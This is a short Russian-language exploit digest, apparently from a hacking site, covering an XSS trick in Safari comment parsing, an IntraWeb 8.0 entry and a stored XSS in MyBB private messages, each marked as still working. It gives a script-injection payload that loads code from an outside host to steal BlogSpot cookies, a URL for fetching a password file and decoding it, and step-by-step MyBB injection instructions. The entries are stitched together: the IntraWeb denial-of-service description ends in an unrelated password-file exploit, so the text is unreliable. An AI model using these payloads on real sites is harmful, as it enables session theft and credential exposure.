Описание:
Safari на причины может выполнить код в HTML-документе, который может
руководить выполнением html-тегов внутри комментария. Детали:
В некоторых случаях вы можете заставить Apple’s Safari браузер выполнить
произвольный код, который не должен выполнятся. В нашем примере всё что
внутри комментариев, в теории не должно выполнятся, но Safsri начинает
выполнять эти теги: <title>myblog<!--</title></head><body><script
src=http://beanfuzz.com/bean.js> --></title>
Блоги расположенные на BlogSpot.com имеют фильтр для этого ввода, но это
не мешает нам вставить код внутрь комментариев. Тогда становится
возможна XSS атака на куки.
Комментарий::
Уязвимсоть работаспособна на данный момент.
ПО: IntraWeb
Версия: 8.0
О продукте:
IntraWeb это RAD компонент для Borland Delphi и Kylix от AToZed
Software, который позволяет программистам ускорить создание
веб-приложений. Описание:
DoS имеет место, когда специальный HTTP запрос послан на веб-приложение.
После запроса, неккоректный поток входит в точку входа и выполняется.
До IIS 5.x поток никогда не останваливается.
До IIS 6 вебсервер автоматически останавливает поток после определённого
времени.
Использование: http://www.site.com/pwd.txt
Потом расшифровываем пароли по bass64. Комментарий::
Уязвимсоть работаспособна на данный момент.
ПО: MyBB
Использование:
Для использования вы должны быть зарегестрированны и авторизованы:
- идите в http://target/mybbpath/private.php
- вставьте ваш xss-код в "Тема"
- Нажмите "Просмотреть" Комментарий::
Уязвимсоть работаспособна на данный момент.